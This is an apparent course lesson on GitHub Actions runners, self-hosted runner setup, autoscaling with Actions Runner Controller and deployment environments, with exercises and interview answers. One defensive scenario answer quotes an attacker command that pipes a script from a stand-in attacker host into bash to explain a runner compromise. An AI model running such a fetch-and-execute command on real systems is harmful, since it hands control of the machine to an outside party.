Basics Lesson 4 of 14

Runners & Environments

Where your workflows actually execute — GitHub-hosted runners, self-hosted runners, and deployment environments.

🧒 Simple Explanation (ELI5)

Back to our kitchen analogy from the previous lessons. You've written your recipe (the workflow YAML) and listed all the dishes (jobs) and cooking steps. But where do you actually cook?

Runners are the kitchens where your recipes run. There are two types:

GitHub-hosted runners = renting a professional kitchen. Every time you need to cook, GitHub gives you a brand-new, spotless kitchen with all the standard tools already installed — pots, pans, knives, an oven. You cook your meal, serve it, and walk out. The kitchen is cleaned and demolished. Next time, you get a completely new one. It costs per hour of use, but you never worry about maintenance, cleaning, or broken equipment.

Self-hosted runners = your own kitchen at home. It's always there. You can customize it however you want — install a pizza oven, stock your favorite spices, add a deep fryer. There's no rental cost. But you maintain it. If the stove breaks, you fix it. If it gets dirty, you clean it. And if someone sneaky walks in through the back door and messes with your food — that's your security problem.

Then there are deployment environments — these aren't kitchens, they're dining rooms. You have a casual dining room (staging) where you taste-test the food before the big dinner. And you have the formal dining room (production) where actual guests eat. Before serving food in the formal room, a head chef (reviewer) has to approve it. Environments add gates and rules to where your code goes after it's built.

🔧 Technical — GitHub-Hosted Runners

GitHub-hosted runners are virtual machines managed entirely by GitHub. They're created fresh for each job, execute your steps, and are destroyed afterward. Zero state carries over between runs.

Available Runner Images

LabelOSArchitectureNotes
ubuntu-latestUbuntu 22.04 LTSx64Most popular. Will roll forward to 24.04 eventually.
ubuntu-24.04Ubuntu 24.04 LTSx64Pin to a specific version when -latest rollover is a risk.
windows-latestWindows Server 2022x64Needed for .NET Framework, MSBuild, or Windows-specific tests.
macos-latestmacOS 14 (Sonoma)ARM64 (M1)Required for iOS/macOS builds with Xcode.
macos-14macOS 14 (Sonoma)ARM64 (M1)Apple Silicon — faster than Intel-based macOS runners.
macos-13macOS 13 (Ventura)x64 (Intel)Legacy Intel runner for older Xcode versions.
💡
Pinning vs. Latest

Using ubuntu-latest is convenient but risky for reproducible builds. When GitHub rolls the label forward (e.g., from 22.04 to 24.04), your workflow may break due to different package versions or removed tools. For production pipelines, pin the version: runs-on: ubuntu-22.04. For quick CI checks, -latest is fine.

Hardware Specifications

Runner TypeCPURAMStorage
Linux / Windows (standard)2-core x647 GB14 GB SSD
macOS (standard)3-core (M1 or Intel)7 GB (Intel) / 14 GB (M1)14 GB SSD
Linux larger runners4 / 8 / 16 / 32 / 64 cores16–256 GB150–2040 GB SSD

Larger runners (4+ cores) are available on GitHub Team and Enterprise plans only. They're essential for heavy workloads like large Gradle builds, ML model training, or running dozens of parallel test containers.

Pre-Installed Software

GitHub-hosted runners come loaded with commonly used tools so you don't have to install them every run:

CategoryTools
LanguagesNode.js, Python, Java (multiple versions), Go, .NET, Ruby, PHP, Rust
ContainersDocker, Docker Compose, Podman (Linux), containerd
Cloud CLIsAzure CLI, AWS CLI v2, Google Cloud SDK
Kuberneteskubectl, Helm, Minikube, Kind
IaCTerraform, Pulumi, Ansible
Build ToolsMaven, Gradle, CMake, Make, npm, yarn, pip
Utilitiesgit, curl, wget, jq, zip/unzip, OpenSSL
💡
Full Software List

The complete list of installed software for each runner image is published in the actions/runner-images repository. Check the README for links to each image's software inventory. If a tool is missing, you can install it in a step before using it — but this adds time to every run.

Ephemeral Nature

This is the most important characteristic of GitHub-hosted runners: every job gets a brand-new VM. When the job finishes, the VM is destroyed. This means:

Syntax

yaml
jobs:
  build:
    # Use a GitHub-hosted Ubuntu runner
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: echo "Running on $(uname -a)"

  test-windows:
    # Use a GitHub-hosted Windows runner
    runs-on: windows-latest
    steps:
      - uses: actions/checkout@v4
      - run: echo "Running on Windows"
        shell: pwsh  # PowerShell Core on Windows

🔧 Technical — Self-Hosted Runners

Self-hosted runners are machines you own and manage that connect to GitHub Actions to execute workflow jobs. They can be physical servers, VMs, cloud instances, or containers — anything that can run the GitHub Actions runner application.

Why Use Self-Hosted Runners?

Setting Up a Self-Hosted Runner

Navigate to your repository (or organization) → Settings → Actions → Runners → New self-hosted runner. GitHub provides a script to download and configure the runner agent:

bash
# Download the runner package (Linux x64 example)
mkdir actions-runner && cd actions-runner
curl -o actions-runner-linux-x64-2.311.0.tar.gz -L \
  https://github.com/actions/runner/releases/download/v2.311.0/actions-runner-linux-x64-2.311.0.tar.gz
tar xzf ./actions-runner-linux-x64-2.311.0.tar.gz

# Configure the runner — connects it to your repository
./config.sh --url https://github.com/YOUR-ORG/YOUR-REPO \
            --token YOUR-REGISTRATION-TOKEN

# Start the runner as a service (persists across reboots)
sudo ./svc.sh install
sudo ./svc.sh start

Labels

Every self-hosted runner has labels that workflows use to select it. Default labels are assigned automatically based on the machine: self-hosted, linux (or windows, macOS), and x64 (or ARM64). You can add custom labels like gpu, high-memory, production, or team-backend.

yaml
jobs:
  train-model:
    # Runs on a self-hosted Linux machine with a GPU
    # ALL labels must match — this is an AND condition
    runs-on: [self-hosted, linux, gpu]
    steps:
      - uses: actions/checkout@v4
      - run: nvidia-smi  # Verify GPU is available
      - run: python train.py

  standard-ci:
    # Falls back to a regular self-hosted Linux runner
    runs-on: [self-hosted, linux]
    steps:
      - uses: actions/checkout@v4
      - run: npm test

Runner Groups

At the organization level, you can create runner groups to control which repositories can use which runners. For example:

Security Considerations

⚠️
Critical Security Warning

Never use self-hosted runners on public repositories. Anyone can fork a public repo, modify the workflow to run arbitrary code, open a PR, and that code executes on your machine. This means attackers can access your network, steal credentials, install malware, or pivot to other internal systems. Self-hosted runners are safe for private repositories where only trusted contributors can trigger workflows.

Autoscaling with Actions Runner Controller (ARC)

For teams running many workflows, manually managing self-hosted runners doesn't scale. Actions Runner Controller (ARC) runs on Kubernetes and automatically provisions runner pods based on workflow demand:

yaml
# Simplified ARC RunnerDeployment (Kubernetes CRD)
apiVersion: actions.summerwind.dev/v1alpha1
kind: RunnerDeployment
metadata:
  name: ci-runners
spec:
  replicas: 1  # Minimum runners
  template:
    spec:
      repository: my-org/my-repo
      labels:
        - self-hosted
        - linux
        - ci
---
apiVersion: actions.summerwind.dev/v1alpha1
kind: HorizontalRunnerAutoscaler
metadata:
  name: ci-runners-autoscaler
spec:
  scaleTargetRef:
    name: ci-runners
  minReplicas: 1
  maxReplicas: 10
  metrics:
    - type: TotalNumberOfQueuedAndInProgressWorkflowRuns
      repositoryNames:
        - my-org/my-repo

When workflows queue up, ARC spins up new runner pods (up to the max). When the queue empties, it scales back down. Each runner pod is ephemeral — destroyed after one job, matching GitHub-hosted behavior.

📊 GitHub-Hosted vs. Self-Hosted — Comparison

FactorGitHub-Hosted RunnersSelf-Hosted Runners
MaintenanceZero — GitHub manages everything (OS updates, tool upgrades, security patches)Full responsibility — you handle OS updates, runner agent updates, tool installs
CostFree tier: 2,000 min/month (Free), 3,000 (Team). Then $0.008/min (Linux), $0.016/min (Windows), $0.08/min (macOS)Infrastructure cost only — no per-minute GitHub billing. Cheaper at high volume.
SecurityEphemeral VMs with no cross-job contamination. Safe for public repos.Persistent by default. Never use on public repos. Requires hardening.
CustomizationLimited to pre-installed software + what you install each run. Standard hardware.Full control — custom OS, GPU, high-memory, specialized libraries.
Network AccessPublic internet only. Cannot reach private VPCs, on-prem databases, or internal APIs.Full access to your internal network, VPN, private subnets.
ScalabilityVirtually unlimited — GitHub manages the runner pool.Limited by your infrastructure. Use ARC on Kubernetes for auto-scaling.
Startup Time~15–40 seconds to provision a fresh VM.Near-instant if the runner is idle. Depends on pod scheduling with ARC.
StateCompletely clean every run — no cache, no leftover files.Persists unless configured as ephemeral. Can pre-cache dependencies.

🔧 Technical — Deployment Environments

Deployment environments are named targets that represent where your code gets deployed — development, staging, production. They're configured in your repository settings and referenced in workflow jobs to add protection rules, scoped secrets, and deployment tracking.

Creating Environments

Navigate to Settings → Environments → New environment. Give it a name (e.g., production). Then configure:

Protection Rules

Protection rules are gates that must be satisfied before a job targeting the environment can run:

RuleWhat It DoesUse Case
Required reviewersOne or more people must approve the deployment in the Actions UI before the job starts. Up to 6 reviewers.Production deployments — a senior engineer or lead reviews before go-live.
Wait timerThe job pauses for a specified number of minutes (0–43,200 = up to 30 days) before executing.Soak time — deploy to staging, wait 30 minutes to monitor, then auto-promote.
Deployment branchesOnly allow deployments from specific branches (e.g., only main can deploy to production).Prevents accidental production deployments from feature branches.
Custom rules (beta)GitHub Apps can implement custom protection logic (e.g., check monitoring dashboards, run smoke tests).Automated promotion gates — only deploy if error rate is below threshold.

Environment Secrets and Variables

Secrets and variables can be scoped to a specific environment. An environment secret named DB_PASSWORD in the production environment is only accessible to jobs that specify environment: production. This prevents staging jobs from accidentally using production credentials.

yaml
# Environment secrets override repository secrets with the same name.
# If both repo-level and environment-level DB_PASSWORD exist,
# the environment-level value wins for jobs targeting that environment.
jobs:
  deploy:
    runs-on: ubuntu-latest
    environment: production  # This job can access production secrets
    steps:
      - run: echo "Connecting to ${{ secrets.DB_PASSWORD }}"
        # Uses the PRODUCTION DB_PASSWORD, not the repo-level one

Using environment: in a Workflow

The environment: key in a job definition links the job to a configured environment. You can also specify a url: that appears in the GitHub UI as a link to the deployed application:

yaml
name: Deploy Pipeline

on:
  push:
    branches: [main]

jobs:
  deploy-staging:
    runs-on: ubuntu-latest
    environment:
      name: staging
      url: https://staging.myapp.com
    steps:
      - uses: actions/checkout@v4
      - run: ./deploy.sh staging

  deploy-production:
    runs-on: ubuntu-latest
    needs: deploy-staging
    environment:
      name: production
      url: https://myapp.com
    steps:
      - uses: actions/checkout@v4
      - run: ./deploy.sh production

When deploy-production runs, it pauses and waits for a reviewer to approve (if required reviewers are configured). The reviewer sees a notification, can inspect the staging deployment, and then clicks Approve and deploy.

Deployment Activity

Every deployment to an environment is tracked in the Deployments section of your repository. You can see:

📊 Runner & Environment Flow

Code Push → Runner Execution Flow
Code Push
GitHub Actions
Runner Pool
Runner Selection
GitHub-Hosted (ubuntu, windows, macos)
Self-Hosted (custom labels)
Execute Job
Environment Deployment Flow with Approval Gate
Build & Test
Deploy Staging (auto)
⏸ Review & Approve
Deploy Production
Environment Secret Scoping
Repository Secrets
Available to all jobs
Staging Env Secrets
Only jobs with environment: staging
/
Production Env Secrets
Only jobs with environment: production

⌨️ Hands-on Exercises

Exercise 1: Compare Ubuntu vs. Windows Runners

Create a workflow that runs the same job on both ubuntu-latest and windows-latest to observe the environment differences:

yaml
name: Runner Comparison

on:
  workflow_dispatch:  # Manual trigger

jobs:
  compare:
    strategy:
      matrix:
        os: [ubuntu-latest, windows-latest]
    runs-on: ${{ matrix.os }}
    steps:
      - name: OS Information
        run: |
          echo "Runner OS: ${{ runner.os }}"
          echo "Runner Arch: ${{ runner.arch }}"
          echo "Runner Name: ${{ runner.name }}"
          echo "Runner Temp: ${{ runner.temp }}"
          echo "Runner Tool Cache: ${{ runner.tool_cache }}"

      - name: List pre-installed tools
        run: |
          echo "--- Node.js ---"
          node --version
          echo "--- Python ---"
          python3 --version || python --version
          echo "--- Docker ---"
          docker --version || echo "Docker not available"
          echo "--- kubectl ---"
          kubectl version --client || echo "kubectl not available"
          echo "--- Helm ---"
          helm version || echo "Helm not available"
        shell: bash

What to verify: Trigger manually from Actions tab. You'll see two jobs — one on Ubuntu, one on Windows. Compare the installed tool versions, the working directory paths (/home/runner vs. C:\), and which tools are available on each OS.

Exercise 2: Add an Environment with Protection Rules

Set up a deployment environment with a manual approval gate:

  1. Go to repository Settings → Environments → New environment
  2. Name it production
  3. Under Environment protection rules, enable Required reviewers and add yourself
  4. Optionally add a Wait timer of 5 minutes
  5. Under Deployment branches, select Selected branches and add main

Then create this workflow:

yaml
name: Deploy with Approval

on:
  push:
    branches: [main]

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: echo "Building application..."
      - run: echo "Running tests..."

  deploy:
    runs-on: ubuntu-latest
    needs: build
    environment:
      name: production
      url: https://myapp.example.com
    steps:
      - uses: actions/checkout@v4
      - name: Deploy
        run: |
          echo "🚀 Deploying to production!"
          echo "Environment: ${{ github.event.deployment.environment }}"
          echo "Approved by a reviewer before reaching this point."

What to verify: Push to main. The build job completes immediately. The deploy job shows "Waiting for review" — click into it, approve it, and watch it run.

Exercise 3: Explore the runner Context

The runner context provides information about the machine executing the current job:

yaml
name: Runner Context Explorer

on: workflow_dispatch

jobs:
  explore:
    runs-on: ubuntu-latest
    steps:
      - name: Dump runner context
        run: |
          echo "runner.os = ${{ runner.os }}"          # Linux, Windows, or macOS
          echo "runner.arch = ${{ runner.arch }}"       # X64, ARM64
          echo "runner.name = ${{ runner.name }}"       # Runner machine name
          echo "runner.temp = ${{ runner.temp }}"       # Path to temp directory
          echo "runner.tool_cache = ${{ runner.tool_cache }}"  # Path to tool cache

      - name: Check disk space
        run: df -h

      - name: Check memory
        run: free -m

      - name: Check CPU
        run: lscpu | head -20

What to verify: Confirm the 2-core CPU, ~7 GB RAM, and ~14 GB disk. These match the documented specs for standard GitHub-hosted Linux runners.

🐛 Debugging Common Issues

Scenario: "No runner matching the specified labels was found"

The job sits in "Queued" and eventually fails with this error. GitHub cannot find a runner that matches your runs-on labels.

Scenario: "Job queued but never starts"

The job shows "Queued" for an unusually long time without starting — minutes or even hours.

Scenario: "Environment protection rule — waiting for review"

The deployment job is paused, showing a yellow "Waiting" badge and a "Review deployments" button.

💡
Runner Diagnostic Logs

For self-hosted runner issues, check the runner's diagnostic logs at _diag/Runner_*.log and _diag/Worker_*.log in the runner installation directory. These contain detailed connection, registration, and job execution logs. For GitHub-hosted runner issues, enable ACTIONS_STEP_DEBUG secret (value true) to get verbose step-level output.

🎯 Interview Questions

Beginner

Q: What is the difference between a GitHub-hosted runner and a self-hosted runner?

A GitHub-hosted runner is a virtual machine managed entirely by GitHub. It's provisioned fresh for every job, comes pre-loaded with common tools (Docker, Node.js, kubectl, etc.), and is destroyed after the job completes. You don't manage it — GitHub handles OS updates, security patches, and scaling. A self-hosted runner is a machine you own and maintain — a physical server, VM, or cloud instance running the GitHub Actions runner agent. You're responsible for OS updates, tool installation, security hardening, and capacity management. Self-hosted runners give you custom hardware (GPUs, high memory), access to private networks, and cost savings at scale, but require significantly more operational effort.

Q: What does runs-on: ubuntu-latest mean and what does the runner provide?

runs-on: ubuntu-latest tells GitHub Actions to execute the job on a GitHub-hosted Ubuntu VM using the latest stable LTS image (currently Ubuntu 22.04, will roll forward to 24.04). The runner provides a 2-core x64 CPU, 7 GB RAM, 14 GB SSD, and hundreds of pre-installed tools including Docker, Node.js, Python, Java, Go, .NET, kubectl, Helm, Azure CLI, AWS CLI, Terraform, git, and more. The VM is ephemeral — created fresh for this job and destroyed afterward. No state persists between runs. The -latest tag means GitHub controls when the version advances, which can cause breakages; pin to ubuntu-22.04 for production pipelines.

Q: What is a deployment environment in GitHub Actions?

A deployment environment is a named target configured in repository settings that represents a deployment destination — such as development, staging, or production. Environments provide three key features: (1) Protection rules — required reviewers who must approve before the deployment runs, wait timers that add a delay, and branch restrictions that limit which branches can deploy. (2) Scoped secrets and variables — secrets like DB_PASSWORD that are only accessible to jobs targeting that specific environment, preventing staging jobs from using production credentials. (3) Deployment tracking — GitHub logs every deployment with the commit SHA, timestamp, triggering user, and a link to the live URL. You reference environments in workflows with the environment: key in a job definition.

Q: Why are GitHub-hosted runners called "ephemeral"?

GitHub-hosted runners are called ephemeral because they are created from scratch for each job and destroyed immediately after. Every job gets a brand-new, clean VM — no files, caches, environment variables, or installed packages from any previous run exist. This provides strong security guarantees (no cross-job contamination) and consistency (identical starting state every time). The downside is that you must re-clone your repository, re-install dependencies, and re-build from scratch every run. To mitigate the performance cost, GitHub provides caching (for dependencies like node_modules) and artifacts (for passing build outputs between jobs).

Q: What is the runner context and what information does it provide?

The runner context is an object available in GitHub Actions expressions that contains information about the runner executing the current job. Key properties: runner.os returns the operating system (Linux, Windows, or macOS), runner.arch returns the CPU architecture (X64 or ARM64), runner.name returns the runner's machine name, runner.temp returns the path to a temporary directory cleared after each job, and runner.tool_cache returns the path to the tool cache directory. It's useful for writing cross-platform workflows: if: runner.os == 'Windows' lets you conditionally use PowerShell syntax on Windows and bash on Linux.

Intermediate

Q: When would you choose self-hosted runners over GitHub-hosted, and what are the trade-offs?

Choose self-hosted runners when you need: (1) Custom hardware — GPUs for ML training, ARM CPUs for ARM-native builds, high-memory machines for large compilations. (2) Private network access — jobs that connect to internal databases, on-prem APIs, or services behind a VPN/firewall. (3) Cost optimization — if you're running hundreds of CI minutes daily, dedicated machines can be cheaper (~$0.008/min for GitHub-hosted Linux adds up). (4) Compliance — data residency requirements where code can't leave your infrastructure. (5) Pre-loaded tools — large Docker images, datasets, or SDKs pre-installed to avoid download time. Trade-offs: you're responsible for maintenance (OS patches, runner updates), security hardening (never use on public repos), capacity planning, and uptime. GitHub-hosted runners are zero-maintenance and safe by default, but limited to standard hardware and public internet.

Q: How does Actions Runner Controller (ARC) work for autoscaling self-hosted runners?

ARC is a Kubernetes operator that manages GitHub Actions self-hosted runners as pods. You deploy ARC to your Kubernetes cluster and define RunnerDeployment resources specifying the repository, labels, and base image. A HorizontalRunnerAutoscaler monitors the GitHub Actions job queue and scales the runner pods up or down based on demand. When workflows queue up, ARC creates new runner pods (up to maxReplicas). When the queue empties, it scales down to minReplicas. Each runner pod is ephemeral — it processes one job and is destroyed, matching GitHub-hosted behavior. ARC supports webhook-based scaling (fastest — reacts to GitHub webhook events in seconds) and polling-based scaling (checks the API periodically). It integrates with Kubernetes features like node selectors, tolerations, and resource requests for GPU scheduling.

Q: What is the difference between environment secrets and repository secrets?

Repository secrets are available to all workflow jobs in the repository, regardless of which environment they target. They're set in Settings → Secrets and variables → Actions. Environment secrets are scoped to a specific deployment environment — they're only accessible to jobs that include environment: <name> in their definition. If both a repository secret and an environment secret have the same name, the environment secret takes precedence for jobs targeting that environment. Use case: you might have a DB_PASSWORD repository secret for development and separate DB_PASSWORD environment secrets for staging and production, each with different values. This prevents staging jobs from accidentally using production credentials. Environment secrets also benefit from environment protection rules — a reviewer must approve before the job can access the secrets.

Q: How do deployment branch restrictions work with environments?

Deployment branch restrictions let you control which branches can trigger deployments to a specific environment. In Settings → Environments → [name] → Deployment branches, you can choose: All branches (any branch can deploy), Protected branches (only branches with branch protection rules), or Selected branches (you specify exact branch names or patterns like release/*). If a workflow job targets the environment from a non-allowed branch, the job fails immediately with a permissions error. This prevents accidental production deployments from feature branches — even if someone modifies the workflow YAML to target production, the protection rule blocks it. Combined with required reviewers, this creates a multi-layer security gate: only approved branches, only after human approval.

Q: Explain the environment: key syntax — what's the difference between a string and an object?

The environment: key supports two forms. String form: environment: production — just the environment name. The job links to the environment for protection rules and secret scoping, but no URL is tracked. Object form: environment:\n name: production\n url: https://myapp.com — includes both the name and a deployment URL. The URL appears in the GitHub UI as a clickable link in the deployment activity log and as a "View deployment" button on the workflow run page. The URL can use expressions: url: https://${{ steps.deploy.outputs.hostname }} to dynamically set it from a deployment step's output. Using the object form is recommended for web applications — it gives reviewers and developers one-click access to verify the live deployment.

Scenario-Based

Q: Your company has both ML workloads (requiring GPUs) and standard web application CI. Design a runner strategy that handles both efficiently.

Use a hybrid setup: (1) Web CI: GitHub-hosted runners (runs-on: ubuntu-latest). Zero maintenance, automatic scaling, and the web team doesn't need to manage infrastructure. Standard 2-core runners handle linting, testing, and Docker builds efficiently. (2) ML workloads: Self-hosted runners on GPU-equipped machines (cloud GPU instances or on-prem hardware), labeled [self-hosted, linux, gpu]. Deploy ARC on Kubernetes with GPU node pools for autoscaling — min 1 pod (always warm), max 5 pods (for batch training). Use --ephemeral flag to prevent state leakage between ML experiments. (3) Organization: Create two runner groups: "general-ci" (GitHub-hosted, all repos) and "ml-runners" (self-hosted GPU, restricted to ML repos only). (4) Cost: Web CI uses GitHub's free tier (2,000 min/month). GPU instances only run when jobs are queued (ARC autoscaling), minimizing cloud spend. Total: zero runner maintenance for 80% of jobs, dedicated hardware for the 20% that need it.

Q: Design an environment promotion strategy for a microservices application with development, staging, and production environments. Include approval gates and secret management.

Create three GitHub environments with escalating protection: (1) development — no protection rules, auto-deploys on every push to develop branch. Environment secrets: dev database URL, dev API keys. (2) staging — deployment branch restriction to main only, 10-minute wait timer (soak time for automated smoke tests). Environment secrets: staging database URL, staging API keys. (3) production — requires 2 reviewers (tech lead + product owner), deployment branch restriction to main, 30-minute wait timer after approval. Environment secrets: production database URL with read/write access, production API keys. Workflow structure: One workflow triggered on push to main with three sequential jobs: deploy-dev (auto) → deploy-staging (auto, 10-min soak) → deploy-production (2 reviewers + 30-min timer). Each job uses its environment's scoped secrets. The wait timer on staging gives the team time to run manual exploratory tests before production promotion. Secret isolation: Each environment's DB_PASSWORD is different — a staging job can never access the production database.

Q: A teammate's workflow keeps failing with "No runner matching labels." The workflow uses runs-on: [self-hosted, linux, arm64]. How do you troubleshoot?

Systematic troubleshooting: (1) Check registered runners: Settings → Actions → Runners. Verify a runner exists with ALL three labels: self-hosted, linux, and arm64. Labels are AND-matched — missing any one label means no match. (2) Check runner status: Is it showing as "Online" (green dot) or "Offline" (red)? If offline, SSH into the machine and check: sudo ./svc.sh status. Restart: sudo ./svc.sh start. Check _diag/Runner_*.log for errors. (3) Check runner group: If it's an org-level runner, verify the runner group includes this repository in its access list. (4) Check label case: Labels are case-insensitive, but ensure no invisible characters or trailing spaces. (5) Check busy status: If the runner is executing another job and no other matching runners exist, the job queues until the runner is free. Solution: add more runners or use ARC. (6) Check ephemeral: If the runner was configured with --ephemeral, it deregisters after one job. A new instance must start before the next job can be picked up.

Q: Your self-hosted runner was compromised after being used on a public repository. How did this happen and how do you prevent it?

How it happened: An attacker forked the public repository, modified the workflow YAML in their fork to execute malicious commands (e.g., run: curl http://attacker.com/exfil | bash), and opened a pull request. GitHub Actions triggered the workflow on the pull_request event, and the malicious code ran on the self-hosted runner with full access to the machine's filesystem, network, and any cached credentials. Prevention: (1) Never use self-hosted runners on public repos — this is the fundamental rule. Use GitHub-hosted runners for public repos. (2) For private repos: Use ephemeral runners (--ephemeral flag) so no state persists. Run the runner agent inside a container with limited privileges. (3) Restrict fork PR triggers: Set on: pull_request_target instead of pull_request and require approval for first-time contributors. (4) Runner groups: Restrict sensitive runners to specific repos via runner groups. (5) Harden the machine: Minimal OS, no unnecessary services, network segmentation, and regular rotation of credentials.

Q: A fintech company needs CI/CD that meets SOC 2 compliance. How would you design the runner and environment strategy?

Runners: Self-hosted runners inside the company's VPC on hardened, CIS-benchmarked VMs. This ensures code and build artifacts never leave the controlled network (data residency). Use ARC on an internal Kubernetes cluster for autoscaling. All runner VMs run container-based ephemeral jobs — no state persistence. Runner images are built from an approved base, scanned for vulnerabilities, and rotated weekly. Environments: Three environments with escalating controls. staging — auto-deploy from main, environment secrets for staging DB, audit log enabled. production — requires two reviewers (engineering lead + security officer), deployment branch restricted to main, 1-hour wait timer (soak period), environment secrets for production systems with separate least-privilege credentials. Audit trail: All deployments logged in GitHub's deployment history (who approved, when, which commit). Integrate with SIEM for monitoring. Secrets: No hardcoded credentials — use environment secrets + external vault integration (HashiCorp Vault or Azure Key Vault). Rotate all secrets quarterly. Open-source projects: Use GitHub-hosted runners only — complete isolation from corporate infrastructure.

🌍 Real-World Use Case

A fintech company with 50+ engineers needed a CI/CD strategy that balanced speed, cost, compliance, and security across multiple project types.

The Challenge

The company had three categories of projects: (1) open-source client libraries published on npm/PyPI, (2) internal microservices handling payment processing, and (3) a data science team training fraud detection models. Each had different requirements:

The Solution

Project TypeRunner StrategyEnvironment Strategy
Open-source libraries GitHub-hosted runners only (ubuntu-latest). Safe for untrusted PR code. No access to internal resources. Single release environment with required reviewer (maintainer must approve npm publish).
Internal microservices Self-hosted runners inside VPC for integration tests. Ephemeral, container-based via ARC. GitHub-hosted for linting/unit tests. Three environments: dev (auto-deploy), staging (auto + 15-min soak), production (2 reviewers + branch restriction to main).
ML pipelines Self-hosted runners on GPU instances (NVIDIA A100) in a dedicated Kubernetes GPU node pool. ARC manages scaling 1–4 pods based on job queue. training environment (auto, tracks experiment metadata). model-production environment (data scientist + ML engineer approval required).

The Results

📝 Summary

← Back to GitHub Actions Course